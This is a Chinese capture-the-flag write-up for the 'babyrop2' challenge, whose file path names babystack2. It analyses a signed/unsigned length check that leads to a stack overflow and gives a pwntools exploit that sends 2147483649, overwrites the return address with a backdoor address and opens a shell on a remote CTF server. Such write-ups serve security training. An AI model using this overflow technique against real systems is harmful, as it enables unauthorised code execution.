bjdctf 2020 babyrop2
# bjdctf 2020 babyrop2
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/bjdctf_2020_babystack2/bjdctf_2020_babystack2'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf; // [rsp+0h] [rbp-10h]
size_t nbytes; // [rsp+Ch] [rbp-4h]
setvbuf(_bss_start, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 1, 0LL);
LODWORD(nbytes) = 0;
puts("**********************************");
puts("* Welcome to the BJDCTF! *");
puts("* And Welcome to the bin world! *");
puts("* Let's try to pwn the world! *");
puts("* Please told me u answer loudly!*");
puts("[+]Are u ready?");
puts("[+]Please input the length of your name:");
__isoc99_scanf("%d", &nbytes);
if ( (signed int)nbytes > 10 )
{
puts("Oops,u name is too long!");
exit(-1);
}
puts("[+]What's u name?");
read(0, &buf, (unsigned int)nbytes);
return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
backdoor函数如下
signed __int64 backdoor()
{
system("/bin/sh");
return 1LL;
}
1
2
3
4
5
2
3
4
5
# 思路分析
- 目前信息:
- 控制
nbytes即可实现任意长度数据写入 nbytes被if判断限制在10if判断nbytes时是有符号数,read时是无符号数- 有后门函数
- No PIE
- 控制
- 思路:
- 利用有符号数和无符号数的区别,绕过判断,实现溢出劫持程序流到后门函数获得
shell
- 利用有符号数和无符号数的区别,绕过判断,实现溢出劫持程序流到后门函数获得
# exp
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
pwnfile = '/root/pwn/buuctf/bjdctf_2020_babystack2/bjdctf_2020_babystack2'
io = remote('node4.buuoj.cn', 28880)
# io = process(pwnfile)
elf = ELF(pwnfile)
backdoor_addr = elf.symbols['backdoor']
offset = 0x10+8
io.sendlineafter('your name:', '2147483649')
payload = flat(['a'*offset, backdoor_addr])
io.sendlineafter('u name?\n', payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
2
3
4
5
6
7
8
9
10
11
12
上次更新: 2022/08/15, 00:29:49